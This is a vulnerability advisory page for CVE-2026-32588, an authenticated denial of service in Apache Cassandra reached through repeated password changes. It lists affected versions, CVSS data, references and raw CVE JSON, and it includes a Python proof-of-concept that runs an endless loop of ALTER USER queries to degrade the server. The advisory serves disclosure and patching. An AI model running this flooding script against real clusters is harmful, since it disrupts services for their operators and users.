Security Vulnerability Report
CVE-2026-32588 CVSS 6.5 MEDIUM

CVE-2026-32588

Published: 2026-04-07 17:16:28
Last Modified: 2026-04-15 15:45:40

Description

Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows an authenticated user to raise query latencies via repeated password changes. Users are recommended to upgrade to version 4.0.20, 4.1.11, or 5.0.7, which fixes this issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* (4.0.0 <= version < 4.0.20) - VULNERABLE
cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* (4.1.0 <= version < 4.1.11) - VULNERABLE
cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:* (5.0.0 <= version < 5.0.7) - VULNERABLE
Apache Cassandra 4.0 < 4.0.20
Apache Cassandra 4.1 < 4.1.11
Apache Cassandra 5.0 < 5.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-32588 (Authenticated DoS in Apache Cassandra)
# This script simulates repeated password changes to increase query latency.
# Requires: pip install cassandra-driver
from cassandra.cluster import Cluster
import time

TARGET_HOST = '127.0.0.1'
TARGET_PORT = 9042
USERNAME = 'cassandra'
PASSWORD = 'cassandra'

print(f"[*] Connecting to {TARGET_HOST}:{TARGET_PORT}...")
cluster = Cluster([TARGET_HOST], port=TARGET_PORT)
session = cluster.connect()

# Login using credentials
session.execute(f"ALTER USER {USERNAME} WITH PASSWORD '{PASSWORD}'")
print("[+] Connected. Starting DoS loop...")

try:
    while True:
        # Repeatedly change the password to trigger the latency spike
        # In a real scenario, this loops indefinitely to degrade performance
        query = f"ALTER USER {USERNAME} WITH PASSWORD '{PASSWORD}'"
        session.execute(query)
        print(f"[+] Executed: {query} | Latency increasing...")
        time.sleep(0.1)  # Minimal delay to flood the server
except Exception as e:
    print(f"[-] Exception occurred: {e}")
finally:
    cluster.shutdown()
    print("[*] Connection closed.")
```

References

https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc (Mailing List, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/04/07/9 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-32588",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T17:16:28.297",
    "lastModified": "2026-04-15T15:45:40.473",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authenticated DoS over CQL in Apache Cassandra 4.0, 4.1, 5.0 allows authenticated user to raise query latencies via repeated password changes.\nUsers are recommended to upgrade to version 4.0.20, 4.1.11, 5.0.7, which fixes this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "4.0.20",
                "matchCriteriaId": "C531A747-3AEF-4CDC-B614-784DC3B6213E"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.1.0",
                "versionEndExcluding": "4.1.11",
                "matchCriteriaId": "2CA46AD5-4A57-43F1-889E-7A77FBC3B6A8"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "5.0.0",
                "versionEndExcluding": "5.0.7",
                "matchCriteriaId": "31249BDD-7A3E-4B31-A274-4C7237920C6C"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/2tnwjdnss378glxrsmnlzz3k53ftphrc",
        "source": "[email protected]",
        "tags": ["Mailing List", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/04/07/9",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}